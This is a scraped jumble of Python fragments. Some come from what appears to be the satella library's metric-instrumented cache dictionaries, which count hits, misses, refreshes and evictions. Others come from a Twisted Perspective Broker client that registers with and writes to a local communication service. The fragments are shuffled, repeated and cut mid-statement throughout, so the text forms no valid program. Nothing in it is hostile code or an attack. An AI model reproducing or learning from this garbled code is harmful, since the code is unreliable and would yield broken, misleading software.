that will be updated with +1 each time", "be ticked with time value_getter took \"\"\" def __init__(self, stale_interval: float, expiration_interval: float,", "how_long_refresh_takes: value_getter = how_long_refresh_takes.measure(value_getter=time_getter)(value_getter) super().__init__(stale_interval, expiration_interval, value_getter, value_getter_executor, cache_failures_interval, time_getter, default_value_factory, max_size=max_size) self.cache_hits", "is not None: self.evictions.runtime(+1) super().evict() def __getitem__(self, item): if self.has_info_about(item): if self.cache_hits: self.cache_hits.runtime(+1)", "each time there's a cache refresh :param how_long_refresh_takes: a metric that will be", "..metric_types.counter import CounterMetric from ..metric_types.measurable_mixin import MeasurableMixin logger = logging.getLogger(__name__) class MetrifiedCacheDict(CacheDict[K, V]):", "from satella.coding.typing import K, V from .. import Metric from ..metric_types.callable import CallableMetric", "Metric from ..metric_types.callable import CallableMetric from ..metric_types.counter import CounterMetric from ..metric_types.measurable_mixin import MeasurableMixin", "default_value_factory, max_size=max_size) self.cache_hits = cache_hits self.cache_miss = cache_miss self.refreshes = refreshes self.evictions =", "self.has_info_about(item): if self.cache_hits: self.cache_hits.runtime(+1) else: if self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item) class MetrifiedLRUCacheDict(LRUCacheDict[K, V]):", "default_value_factory=None, max_size: int = 100, cache_hits: tp.Optional[Metric] = None, cache_miss: tp.Optional[Metric] = None,", "import MeasurableMixin logger = logging.getLogger(__name__) class MetrifiedCacheDict(CacheDict[K, V]): \"\"\" A CacheDict with metrics!", "100, cache_hits: tp.Optional[Metric] = None, cache_miss: tp.Optional[Metric] = None, refreshes: tp.Optional[Metric] = None,", "metric that will be updated with +1 each time there's a cache miss", "def value_getter_replacement(item): try: return old_value_getter(item) finally: if self.refreshes: self.refreshes.runtime(+1) value_getter = value_getter_replacement if", "self.refreshes = refreshes self.evictions = evictions self.how_long_refresh_takes = how_long_refresh_takes def evict(self): if self.evictions", "A CacheDict with metrics! :param cache_hits: a counter metric that will be updated", "CounterMetric from ..metric_types.measurable_mixin import MeasurableMixin logger = logging.getLogger(__name__) class MetrifiedCacheDict(CacheDict[K, V]): \"\"\" A", "super().__init__(*args, **kwargs) self.cache_miss = cache_miss self.cache_hits = cache_hits if entries_waiting is not None:", "value_getter, value_getter_executor, cache_failures_interval, time_getter, default_value_factory) self.cache_hits = cache_hits self.cache_miss = cache_miss self.refreshes =", "None, cache_miss: tp.Optional[CounterMetric] = None, entries_waiting: tp.Optional[CallableMetric] = None, **kwargs): super().__init__(*args, **kwargs) self.cache_miss", "expiration_interval: float, value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, max_size: int = 100, cache_hits: tp.Optional[Metric]", "entries_waiting is not None: entries_waiting.callable = self.get_queue_length() def __getitem__(self, item): if item in", "refresh :param how_long_refresh_takes: a metric that will be ticked with time value_getter took", "= None, refreshes: tp.Optional[Metric] = None, how_long_refresh_takes: tp.Optional[MeasurableMixin] = None, evictions: tp.Optional[Metric] =", "self.cache_hits = cache_hits if entries_waiting is not None: entries_waiting.callable = self.get_queue_length() def __getitem__(self,", ":param how_long_refresh_takes: a metric that will be ticked with time value_getter took \"\"\"", "return super().__getitem__(item) class MetrifiedLRUCacheDict(LRUCacheDict[K, V]): \"\"\" A LRUCacheDict with metrics! :param cache_hits: a", "is not None: entries_waiting.callable = self.get_queue_length() def __getitem__(self, item): if item in self.in_cache:", "if entries_waiting is not None: entries_waiting.callable = self.get_queue_length() def __getitem__(self, item): if item", "CacheDict, LRUCacheDict, ExclusiveWritebackCache from satella.coding.typing import K, V from .. import Metric from", "V]): \"\"\" A LRUCacheDict with metrics! :param cache_hits: a counter metric that will", "self.cache_miss = cache_miss self.refreshes = refreshes self.evictions = evictions self.how_long_refresh_takes = how_long_refresh_takes def", "value_getter def value_getter_replacement(item): try: return old_value_getter(item) finally: if self.refreshes: self.refreshes.runtime(+1) value_getter = value_getter_replacement", "if item in self.in_cache: if self.cache_hits: self.cache_hits.runtime(+1) else: if self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item)", "tp from satella.coding.structures import CacheDict, LRUCacheDict, ExclusiveWritebackCache from satella.coding.typing import K, V from", "time_getter=time.monotonic, default_value_factory=None, cache_hits: tp.Optional[CounterMetric] = None, cache_miss: tp.Optional[CounterMetric] = None, refreshes: tp.Optional[CounterMetric] =", "= how_long_refresh_takes def __getitem__(self, item): if self.has_info_about(item): if self.cache_hits: self.cache_hits.runtime(+1) else: if self.cache_miss:", "= how_long_refresh_takes.measure(value_getter=time_getter)(value_getter) super().__init__(stale_interval, expiration_interval, value_getter, value_getter_executor, cache_failures_interval, time_getter, default_value_factory) self.cache_hits = cache_hits self.cache_miss", "if self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item) class MetrifiedLRUCacheDict(LRUCacheDict[K, V]): \"\"\" A LRUCacheDict with metrics!", "= how_long_refresh_takes.measure(value_getter=time_getter)(value_getter) super().__init__(stale_interval, expiration_interval, value_getter, value_getter_executor, cache_failures_interval, time_getter, default_value_factory, max_size=max_size) self.cache_hits = cache_hits", "cache_miss self.cache_hits = cache_hits if entries_waiting is not None: entries_waiting.callable = self.get_queue_length() def", "item): if item in self.in_cache: if self.cache_hits: self.cache_hits.runtime(+1) else: if self.cache_miss: self.cache_miss.runtime(+1) return", ":param refreshes: a metric that will be updated with +1 each time there's", "try: return old_value_getter(item) finally: if self.refreshes: self.refreshes.runtime(+1) value_getter = value_getter_replacement if how_long_refresh_takes: value_getter", "be ticked with time value_getter took \"\"\" def __init__(self, stale_interval, expiration_interval, value_getter, value_getter_executor=None,", "else: if self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item) class MetrifiedLRUCacheDict(LRUCacheDict[K, V]): \"\"\" A LRUCacheDict with", "time there's a cache hit :param cache_miss: a counter metric that will be", "refreshes self.evictions = evictions self.how_long_refresh_takes = how_long_refresh_takes def evict(self): if self.evictions is not", "value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, cache_hits: tp.Optional[CounterMetric] = None, cache_miss: tp.Optional[CounterMetric] = None,", "None, **kwargs): super().__init__(*args, **kwargs) self.cache_miss = cache_miss self.cache_hits = cache_hits if entries_waiting is", "time value_getter took \"\"\" def __init__(self, stale_interval, expiration_interval, value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None,", "item): if self.has_info_about(item): if self.cache_hits: self.cache_hits.runtime(+1) else: if self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item) class", "__init__(self, stale_interval: float, expiration_interval: float, value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, max_size: int =", "cache_miss self.refreshes = refreshes self.how_long_refresh_takes = how_long_refresh_takes def __getitem__(self, item): if self.has_info_about(item): if", "self.evictions.runtime(+1) super().evict() def __getitem__(self, item): if self.has_info_about(item): if self.cache_hits: self.cache_hits.runtime(+1) else: if self.cache_miss:", "= cache_miss self.refreshes = refreshes self.evictions = evictions self.how_long_refresh_takes = how_long_refresh_takes def evict(self):", "= value_getter def value_getter_replacement(item): try: return old_value_getter(item) finally: if self.refreshes: self.refreshes.runtime(+1) value_getter =", "miss :param refreshes: a metric that will be updated with +1 each time", "MetrifiedLRUCacheDict(LRUCacheDict[K, V]): \"\"\" A LRUCacheDict with metrics! :param cache_hits: a counter metric that", "*args, cache_hits: tp.Optional[CounterMetric] = None, cache_miss: tp.Optional[CounterMetric] = None, entries_waiting: tp.Optional[CallableMetric] = None,", "= None, evictions: tp.Optional[Metric] = None, **kwargs): if refreshes: old_value_getter = value_getter def", "super().__getitem__(item) class MetrifiedExclusiveWritebackCache(ExclusiveWritebackCache[K, V]): __slots__ = ('cache_miss', 'cache_hits') def __init__(self, *args, cache_hits: tp.Optional[CounterMetric]", "__init__(self, stale_interval, expiration_interval, value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, cache_hits: tp.Optional[CounterMetric] = None, cache_miss:", "A LRUCacheDict with metrics! :param cache_hits: a counter metric that will be updated", "cache_hits: tp.Optional[Metric] = None, cache_miss: tp.Optional[Metric] = None, refreshes: tp.Optional[Metric] = None, how_long_refresh_takes:", "tp.Optional[CounterMetric] = None, entries_waiting: tp.Optional[CallableMetric] = None, **kwargs): super().__init__(*args, **kwargs) self.cache_miss = cache_miss", "how_long_refresh_takes.measure(value_getter=time_getter)(value_getter) super().__init__(stale_interval, expiration_interval, value_getter, value_getter_executor, cache_failures_interval, time_getter, default_value_factory, max_size=max_size) self.cache_hits = cache_hits self.cache_miss", "as tp from satella.coding.structures import CacheDict, LRUCacheDict, ExclusiveWritebackCache from satella.coding.typing import K, V", "<reponame>piotrmaslanka/satella import logging import time import typing as tp from satella.coding.structures import CacheDict,", "\"\"\" A CacheDict with metrics! :param cache_hits: a counter metric that will be", "refreshes: a metric that will be updated with +1 each time there's a", "MeasurableMixin logger = logging.getLogger(__name__) class MetrifiedCacheDict(CacheDict[K, V]): \"\"\" A CacheDict with metrics! :param", "value_getter_replacement(item): try: return old_value_getter(item) finally: if self.refreshes: self.refreshes.runtime(+1) value_getter = value_getter_replacement if how_long_refresh_takes:", "**kwargs): if refreshes: old_value_getter = value_getter def value_getter_replacement(item): try: return old_value_getter(item) finally: if", "with metrics! :param cache_hits: a counter metric that will be updated with +1", "a metric that will be ticked with time value_getter took \"\"\" def __init__(self,", ":param cache_hits: a counter metric that will be updated with +1 each time", "tp.Optional[MeasurableMixin] = None): if refreshes: old_value_getter = value_getter def value_getter_replacement(item): try: return old_value_getter(item)", "self.cache_hits = cache_hits self.cache_miss = cache_miss self.refreshes = refreshes self.how_long_refresh_takes = how_long_refresh_takes def", "old_value_getter = value_getter def value_getter_replacement(item): try: return old_value_getter(item) finally: if self.refreshes: self.refreshes.runtime(+1) value_getter", "self.cache_hits: self.cache_hits.runtime(+1) else: if self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item) class MetrifiedLRUCacheDict(LRUCacheDict[K, V]): \"\"\" A", "value_getter_replacement if how_long_refresh_takes: value_getter = how_long_refresh_takes.measure(value_getter=time_getter)(value_getter) super().__init__(stale_interval, expiration_interval, value_getter, value_getter_executor, cache_failures_interval, time_getter, default_value_factory)" ]
[]
[ "failed) #d.addCallbacks(closeAndReturn, failed) return d if self.obj is None: factory = pb.PBClientFactory() reactor.connectTCP(\"127.0.0.1\",", "factory = pb.PBClientFactory() reactor.connectTCP(\"127.0.0.1\", Com.myPort, factory) d = factory.getRootObject() d.addCallbacks(connected, failed) else: d", "from comlocal.core.Com import Com class ComIFace (object): def __init__(self, name, port): self.readCB =", "= obj.callRemote('write', msg) d.addCallbacks(writeAck, failed) #d.addCallbacks(closeAndReturn, failed) return d if self.obj is None:", "(object): def __init__(self, name, port): self.readCB = None self._comiface = None self.name =", "obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed) #d.addCallbacks(lambda result: obj.broker.transport.loseConnection(), failed) return d if self.obj is None:", "d.addCallback(lambda res: port.stopListening()) return d def write(self, msg, dest): message = {'msg':msg,'dest':dest} return", "d def unregister(self): def regAck(result): #assert 'success' in result['result'] self.iface.registered = False def", "msg, dest): message = {'msg':msg,'dest':dest} return self._comiface.doWrite(message) def cmd(self, cmd, **kwargs): command =", "d.addCallbacks(connected, failed) else: d = connected(self.obj) return d def doWrite(self, msg): def writeAck(result):", "'success' in result['result'] self.iface.registered = True def failed(reason): print reason def connected(obj): self.obj", "self.obj = obj def closeAndReturn (result): #obj.broker.transport.loseConnection() return result d = obj.callRemote('cmd', cmd)", "self.obj = obj regPacket = {'cmd': 'reg_app', 'name':self.iface.name,'port':self.port} d = obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed)", "obj.broker.transport.loseConnection() # return result d = obj.callRemote('write', msg) d.addCallbacks(writeAck, failed) #d.addCallbacks(closeAndReturn, failed) return", "from twisted.internet import reactor from comlocal.core.Com import Com class ComIFace (object): def __init__(self,", "return result def failed(reason): log.msg(self.failure (str(reason))) reason.printTraceback() def connected(obj): self.obj = obj def", "print reason reason.printTraceback() def connected(obj): self.obj = obj # def closeAndReturn (result): #", "d.addCallbacks(regAck,failed) #d.addCallbacks(lambda result: obj.broker.transport.loseConnection(), failed) return d if self.obj is None: factory =", "d.addCallbacks(writeAck, failed) #d.addCallbacks(closeAndReturn, failed) return d if self.obj is None: factory = pb.PBClientFactory()", "None self.name = name self.port = port def start(self): self._comiface = _ComIFace(self) self.tcpPort", "obj regPacket = {'cmd': 'reg_app', 'name':self.iface.name,'port':self.port} d = obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed) #d.addCallbacks(lambda result:", "obj.callRemote('write', msg) d.addCallbacks(writeAck, failed) #d.addCallbacks(closeAndReturn, failed) return d if self.obj is None: factory", "d = factory.getRootObject() d.addCallbacks(connected, failed) else: d = connected(self.obj) return d def doWrite(self,", "#obj.broker.transport.loseConnection() return result d = obj.callRemote('cmd', cmd) d.addCallbacks(writeAck, failed) d.addCallbacks(closeAndReturn, failed) return d", "reactor.listenTCP(self.port, pb.PBServerFactory(self._comiface), interface='127.0.0.1') d = self._comiface.unregister() d.addCallback(lambda res: self._comiface.register()) return d def stop(self):", "res: port.stopListening()) return d def write(self, msg, dest): message = {'msg':msg,'dest':dest} return self._comiface.doWrite(message)", "def closeAndReturn (result): # obj.broker.transport.loseConnection() # return result d = obj.callRemote('write', msg) d.addCallbacks(writeAck,", "factory.getRootObject() d.addCallbacks(connected, failed) else: d = connected(self.obj) return d def unregister(self): def regAck(result):", "def closeAndReturn (result): #obj.broker.transport.loseConnection() return result d = obj.callRemote('cmd', cmd) d.addCallbacks(writeAck, failed) d.addCallbacks(closeAndReturn,", "pb.PBClientFactory() reactor.connectTCP(\"127.0.0.1\", Com.myPort, factory) d = factory.getRootObject() d.addCallbacks(connected, failed) else: d = connected(self.obj)", "def unregister(self): def regAck(result): #assert 'success' in result['result'] self.iface.registered = False def failed(reason):", "def failed(reason): print reason def connected(obj): self.obj = obj regPacket = {'cmd': 'unreg_app',", "factory) d = factory.getRootObject() d.addCallbacks(connected, failed) else: d = connected(self.obj) return d def", "d = connected(self.obj) return d def unregister(self): def regAck(result): #assert 'success' in result['result']", "**kwargs): command = {'cmd':cmd} for key in kwargs: command[key] = kwargs[key] return self._comiface.doCmd(command)", "d.addCallback(lambda res: self._comiface.register()) return d def stop(self): d = self._comiface.unregister() port, self.tcpPort =", "msg) d.addCallbacks(writeAck, failed) #d.addCallbacks(closeAndReturn, failed) return d if self.obj is None: factory =", "= kwargs[key] return self._comiface.doCmd(command) class _ComIFace(pb.Root): def __init__(self, iface): self.iface = iface self.port", "def start(self): self._comiface = _ComIFace(self) self.tcpPort = reactor.listenTCP(self.port, pb.PBServerFactory(self._comiface), interface='127.0.0.1') d = self._comiface.unregister()", "{'cmd': 'unreg_app', 'name':self.iface.name,'port':self.iface.port} d = obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed) #d.addCallbacks(lambda result: obj.broker.transport.loseConnection(), failed) return", "def connected(obj): self.obj = obj def closeAndReturn (result): #obj.broker.transport.loseConnection() return result d =", "result d = obj.callRemote('cmd', cmd) d.addCallbacks(writeAck, failed) d.addCallbacks(closeAndReturn, failed) return d if self.obj", "d = obj.callRemote('write', msg) d.addCallbacks(writeAck, failed) #d.addCallbacks(closeAndReturn, failed) return d if self.obj is", "= None self._comiface = None self.name = name self.port = port def start(self):", "in result['result'] self.iface.registered = True def failed(reason): print reason def connected(obj): self.obj =", "name self.port = port def start(self): self._comiface = _ComIFace(self) self.tcpPort = reactor.listenTCP(self.port, pb.PBServerFactory(self._comiface),", "#print self.success(str(result)) return result def failed(reason): log.msg(self.failure (str(reason))) reason.printTraceback() def connected(obj): self.obj =", "def connected(obj): self.obj = obj regPacket = {'cmd': 'reg_app', 'name':self.iface.name,'port':self.port} d = obj.callRemote('cmd',", "def failed(reason): print reason reason.printTraceback() def connected(obj): self.obj = obj # def closeAndReturn", "failed(reason): print reason reason.printTraceback() def connected(obj): self.obj = obj # def closeAndReturn (result):", "return result d = obj.callRemote('write', msg) d.addCallbacks(writeAck, failed) #d.addCallbacks(closeAndReturn, failed) return d if", "= obj def closeAndReturn (result): #obj.broker.transport.loseConnection() return result d = obj.callRemote('cmd', cmd) d.addCallbacks(writeAck,", "= _ComIFace(self) self.tcpPort = reactor.listenTCP(self.port, pb.PBServerFactory(self._comiface), interface='127.0.0.1') d = self._comiface.unregister() d.addCallback(lambda res: self._comiface.register())", "self.obj = obj regPacket = {'cmd': 'unreg_app', 'name':self.iface.name,'port':self.iface.port} d = obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed)", "d = obj.callRemote('cmd', cmd) d.addCallbacks(writeAck, failed) d.addCallbacks(closeAndReturn, failed) return d if self.obj is", "cmd) d.addCallbacks(writeAck, failed) d.addCallbacks(closeAndReturn, failed) return d if self.obj is None: factory =", "= connected(self.obj) return d def unregister(self): def regAck(result): #assert 'success' in result['result'] self.iface.registered", "d if self.obj is None: factory = pb.PBClientFactory() reactor.connectTCP(\"127.0.0.1\", Com.myPort, factory) d =", "connected(obj): self.obj = obj # def closeAndReturn (result): # obj.broker.transport.loseConnection() # return result", "twisted.spread import pb from twisted.internet import reactor from comlocal.core.Com import Com class ComIFace", "obj # def closeAndReturn (result): # obj.broker.transport.loseConnection() # return result d = obj.callRemote('write',", "failed) return d if self.obj is None: factory = pb.PBClientFactory() reactor.connectTCP(\"127.0.0.1\", Com.myPort, factory)", "failed(reason): print reason def connected(obj): self.obj = obj regPacket = {'cmd': 'reg_app', 'name':self.iface.name,'port':self.port}", "__init__(self, name, port): self.readCB = None self._comiface = None self.name = name self.port", "cmd, **kwargs): command = {'cmd':cmd} for key in kwargs: command[key] = kwargs[key] return", "d = factory.getRootObject() d.addCallbacks(connected, failed) else: d = connected(self.obj) return d def remote_read(self,", "'unreg_app', 'name':self.iface.name,'port':self.iface.port} d = obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed) #d.addCallbacks(lambda result: obj.broker.transport.loseConnection(), failed) return d", "'name':self.iface.name,'port':self.iface.port} d = obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed) #d.addCallbacks(lambda result: obj.broker.transport.loseConnection(), failed) return d if", "obj regPacket = {'cmd': 'unreg_app', 'name':self.iface.name,'port':self.iface.port} d = obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed) #d.addCallbacks(lambda result:", "def stop(self): d = self._comiface.unregister() port, self.tcpPort = self.tcpPort, None d.addCallback(lambda res: port.stopListening())", "= obj regPacket = {'cmd': 'reg_app', 'name':self.iface.name,'port':self.port} d = obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed) #d.addCallbacks(lambda", "return d def stop(self): d = self._comiface.unregister() port, self.tcpPort = self.tcpPort, None d.addCallback(lambda", "return self._comiface.doWrite(message) def cmd(self, cmd, **kwargs): command = {'cmd':cmd} for key in kwargs:", "'reg_app', 'name':self.iface.name,'port':self.port} d = obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed) #d.addCallbacks(lambda result: obj.broker.transport.loseConnection(), failed) return d", "reason.printTraceback() def connected(obj): self.obj = obj # def closeAndReturn (result): # obj.broker.transport.loseConnection() #", "self._comiface.register()) return d def stop(self): d = self._comiface.unregister() port, self.tcpPort = self.tcpPort, None", "= obj # def closeAndReturn (result): # obj.broker.transport.loseConnection() # return result d =", "self.success(str(result)) return result def failed(reason): log.msg(self.failure (str(reason))) reason.printTraceback() def connected(obj): self.obj = obj", "closeAndReturn (result): #obj.broker.transport.loseConnection() return result d = obj.callRemote('cmd', cmd) d.addCallbacks(writeAck, failed) d.addCallbacks(closeAndReturn, failed)", "command = {'cmd':cmd} for key in kwargs: command[key] = kwargs[key] return self._comiface.doCmd(command) class", "def cmd(self, cmd, **kwargs): command = {'cmd':cmd} for key in kwargs: command[key] =", "result def failed(reason): print reason reason.printTraceback() def connected(obj): self.obj = obj # def", "unregister(self): def regAck(result): #assert 'success' in result['result'] self.iface.registered = False def failed(reason): print", "failed(reason): log.msg(self.failure (str(reason))) reason.printTraceback() def connected(obj): self.obj = obj def closeAndReturn (result): #obj.broker.transport.loseConnection()", "self._comiface = _ComIFace(self) self.tcpPort = reactor.listenTCP(self.port, pb.PBServerFactory(self._comiface), interface='127.0.0.1') d = self._comiface.unregister() d.addCallback(lambda res:", "= connected(self.obj) return d def doCmd(self,cmd): def writeAck(result): #print self.success(str(result)) return result def", "= obj regPacket = {'cmd': 'unreg_app', 'name':self.iface.name,'port':self.iface.port} d = obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed) #d.addCallbacks(lambda", "connected(self.obj) return d def unregister(self): def regAck(result): #assert 'success' in result['result'] self.iface.registered =", "= False def failed(reason): print reason def connected(obj): self.obj = obj regPacket =", "d = self._comiface.unregister() d.addCallback(lambda res: self._comiface.register()) return d def stop(self): d = self._comiface.unregister()", "self.iface.registered = False def failed(reason): print reason def connected(obj): self.obj = obj regPacket", "= self.tcpPort, None d.addCallback(lambda res: port.stopListening()) return d def write(self, msg, dest): message", "def __init__(self, iface): self.iface = iface self.port = self.iface.port self.obj = None def", "self.obj is None: factory = pb.PBClientFactory() reactor.connectTCP(\"127.0.0.1\", Com.myPort, factory) d = factory.getRootObject() d.addCallbacks(connected,", "d = factory.getRootObject() d.addCallbacks(connected, failed) else: d = connected(self.obj) return d def unregister(self):", "print reason def connected(obj): self.obj = obj regPacket = {'cmd': 'unreg_app', 'name':self.iface.name,'port':self.iface.port} d", "return d def doWrite(self, msg): def writeAck(result): return result def failed(reason): print reason", "self._comiface.unregister() port, self.tcpPort = self.tcpPort, None d.addCallback(lambda res: port.stopListening()) return d def write(self,", "cmd(self, cmd, **kwargs): command = {'cmd':cmd} for key in kwargs: command[key] = kwargs[key]", "= {'msg':msg,'dest':dest} return self._comiface.doWrite(message) def cmd(self, cmd, **kwargs): command = {'cmd':cmd} for key", "writeAck(result): #print self.success(str(result)) return result def failed(reason): log.msg(self.failure (str(reason))) reason.printTraceback() def connected(obj): self.obj", "d def doCmd(self,cmd): def writeAck(result): #print self.success(str(result)) return result def failed(reason): log.msg(self.failure (str(reason)))", "class _ComIFace(pb.Root): def __init__(self, iface): self.iface = iface self.port = self.iface.port self.obj =", "iface): self.iface = iface self.port = self.iface.port self.obj = None def register(self): def", "def write(self, msg, dest): message = {'msg':msg,'dest':dest} return self._comiface.doWrite(message) def cmd(self, cmd, **kwargs):", "regPacket = {'cmd': 'unreg_app', 'name':self.iface.name,'port':self.iface.port} d = obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed) #d.addCallbacks(lambda result: obj.broker.transport.loseConnection(),", "return result d = obj.callRemote('cmd', cmd) d.addCallbacks(writeAck, failed) d.addCallbacks(closeAndReturn, failed) return d if", "d = connected(self.obj) return d def doWrite(self, msg): def writeAck(result): return result def", "result d = obj.callRemote('write', msg) d.addCallbacks(writeAck, failed) #d.addCallbacks(closeAndReturn, failed) return d if self.obj", "dest): message = {'msg':msg,'dest':dest} return self._comiface.doWrite(message) def cmd(self, cmd, **kwargs): command = {'cmd':cmd}", "d def stop(self): d = self._comiface.unregister() port, self.tcpPort = self.tcpPort, None d.addCallback(lambda res:", "def regAck(result): assert 'success' in result['result'] self.iface.registered = True def failed(reason): print reason", "def failed(reason): print reason def connected(obj): self.obj = obj regPacket = {'cmd': 'reg_app',", "#d.addCallbacks(closeAndReturn, failed) return d if self.obj is None: factory = pb.PBClientFactory() reactor.connectTCP(\"127.0.0.1\", Com.myPort,", "d.addCallbacks(connected, failed) else: d = connected(self.obj) return d def doCmd(self,cmd): def writeAck(result): #print", "self._comiface.unregister() d.addCallback(lambda res: self._comiface.register()) return d def stop(self): d = self._comiface.unregister() port, self.tcpPort", "self._comiface.doCmd(command) class _ComIFace(pb.Root): def __init__(self, iface): self.iface = iface self.port = self.iface.port self.obj", "= connected(self.obj) return d def doWrite(self, msg): def writeAck(result): return result def failed(reason):", "= name self.port = port def start(self): self._comiface = _ComIFace(self) self.tcpPort = reactor.listenTCP(self.port,", "= factory.getRootObject() d.addCallbacks(connected, failed) else: d = connected(self.obj) return d def doCmd(self,cmd): def", "regAck(result): #assert 'success' in result['result'] self.iface.registered = False def failed(reason): print reason def", "write(self, msg, dest): message = {'msg':msg,'dest':dest} return self._comiface.doWrite(message) def cmd(self, cmd, **kwargs): command", "msg): def writeAck(result): return result def failed(reason): print reason reason.printTraceback() def connected(obj): self.obj", "__init__(self, iface): self.iface = iface self.port = self.iface.port self.obj = None def register(self):", "= factory.getRootObject() d.addCallbacks(connected, failed) else: d = connected(self.obj) return d def remote_read(self, message):", "= {'cmd': 'reg_app', 'name':self.iface.name,'port':self.port} d = obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed) #d.addCallbacks(lambda result: obj.broker.transport.loseConnection(), failed)", "True def failed(reason): print reason def connected(obj): self.obj = obj regPacket = {'cmd':", "= self._comiface.unregister() port, self.tcpPort = self.tcpPort, None d.addCallback(lambda res: port.stopListening()) return d def", "d.addCallbacks(connected, failed) else: d = connected(self.obj) return d def unregister(self): def regAck(result): #assert", "result['result'] self.iface.registered = False def failed(reason): print reason def connected(obj): self.obj = obj", "twisted.internet import reactor from comlocal.core.Com import Com class ComIFace (object): def __init__(self, name,", "self.iface = iface self.port = self.iface.port self.obj = None def register(self): def regAck(result):", "def failed(reason): log.msg(self.failure (str(reason))) reason.printTraceback() def connected(obj): self.obj = obj def closeAndReturn (result):", "failed(reason): print reason def connected(obj): self.obj = obj regPacket = {'cmd': 'unreg_app', 'name':self.iface.name,'port':self.iface.port}", "self._comiface.doWrite(message) def cmd(self, cmd, **kwargs): command = {'cmd':cmd} for key in kwargs: command[key]", "#assert 'success' in result['result'] self.iface.registered = False def failed(reason): print reason def connected(obj):", "self.readCB = None self._comiface = None self.name = name self.port = port def", "return self._comiface.doCmd(command) class _ComIFace(pb.Root): def __init__(self, iface): self.iface = iface self.port = self.iface.port", "import reactor from comlocal.core.Com import Com class ComIFace (object): def __init__(self, name, port):", "_ComIFace(pb.Root): def __init__(self, iface): self.iface = iface self.port = self.iface.port self.obj = None", "port def start(self): self._comiface = _ComIFace(self) self.tcpPort = reactor.listenTCP(self.port, pb.PBServerFactory(self._comiface), interface='127.0.0.1') d =", "= factory.getRootObject() d.addCallbacks(connected, failed) else: d = connected(self.obj) return d def doWrite(self, msg):", "pb.PBServerFactory(self._comiface), interface='127.0.0.1') d = self._comiface.unregister() d.addCallback(lambda res: self._comiface.register()) return d def stop(self): d", "Com class ComIFace (object): def __init__(self, name, port): self.readCB = None self._comiface =", "return d def unregister(self): def regAck(result): #assert 'success' in result['result'] self.iface.registered = False", "d def doWrite(self, msg): def writeAck(result): return result def failed(reason): print reason reason.printTraceback()", "= None self.name = name self.port = port def start(self): self._comiface = _ComIFace(self)", "port, self.tcpPort = self.tcpPort, None d.addCallback(lambda res: port.stopListening()) return d def write(self, msg,", "def connected(obj): self.obj = obj regPacket = {'cmd': 'unreg_app', 'name':self.iface.name,'port':self.iface.port} d = obj.callRemote('cmd',", "d = factory.getRootObject() d.addCallbacks(connected, failed) else: d = connected(self.obj) return d def doCmd(self,cmd):", "def connected(obj): self.obj = obj # def closeAndReturn (result): # obj.broker.transport.loseConnection() # return", "else: d = connected(self.obj) return d def doWrite(self, msg): def writeAck(result): return result", "result['result'] self.iface.registered = True def failed(reason): print reason def connected(obj): self.obj = obj", "'success' in result['result'] self.iface.registered = False def failed(reason): print reason def connected(obj): self.obj", "# return result d = obj.callRemote('write', msg) d.addCallbacks(writeAck, failed) #d.addCallbacks(closeAndReturn, failed) return d", "= port def start(self): self._comiface = _ComIFace(self) self.tcpPort = reactor.listenTCP(self.port, pb.PBServerFactory(self._comiface), interface='127.0.0.1') d", "ComIFace (object): def __init__(self, name, port): self.readCB = None self._comiface = None self.name", "self.name = name self.port = port def start(self): self._comiface = _ComIFace(self) self.tcpPort =", "doWrite(self, msg): def writeAck(result): return result def failed(reason): print reason reason.printTraceback() def connected(obj):", "_ComIFace(self) self.tcpPort = reactor.listenTCP(self.port, pb.PBServerFactory(self._comiface), interface='127.0.0.1') d = self._comiface.unregister() d.addCallback(lambda res: self._comiface.register()) return", "= {'cmd': 'unreg_app', 'name':self.iface.name,'port':self.iface.port} d = obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed) #d.addCallbacks(lambda result: obj.broker.transport.loseConnection(), failed)", "obj def closeAndReturn (result): #obj.broker.transport.loseConnection() return result d = obj.callRemote('cmd', cmd) d.addCallbacks(writeAck, failed)", "self.port = port def start(self): self._comiface = _ComIFace(self) self.tcpPort = reactor.listenTCP(self.port, pb.PBServerFactory(self._comiface), interface='127.0.0.1')", "def regAck(result): #assert 'success' in result['result'] self.iface.registered = False def failed(reason): print reason", "import Com class ComIFace (object): def __init__(self, name, port): self.readCB = None self._comiface", "factory.getRootObject() d.addCallbacks(connected, failed) else: d = connected(self.obj) return d def doWrite(self, msg): def", "iface self.port = self.iface.port self.obj = None def register(self): def regAck(result): assert 'success'", "for key in kwargs: command[key] = kwargs[key] return self._comiface.doCmd(command) class _ComIFace(pb.Root): def __init__(self,", "self.tcpPort, None d.addCallback(lambda res: port.stopListening()) return d def write(self, msg, dest): message =", "d def write(self, msg, dest): message = {'msg':msg,'dest':dest} return self._comiface.doWrite(message) def cmd(self, cmd,", "d = obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed) #d.addCallbacks(lambda result: obj.broker.transport.loseConnection(), failed) return d if self.obj", "import pb from twisted.internet import reactor from comlocal.core.Com import Com class ComIFace (object):", "comlocal.core.Com import Com class ComIFace (object): def __init__(self, name, port): self.readCB = None", "def register(self): def 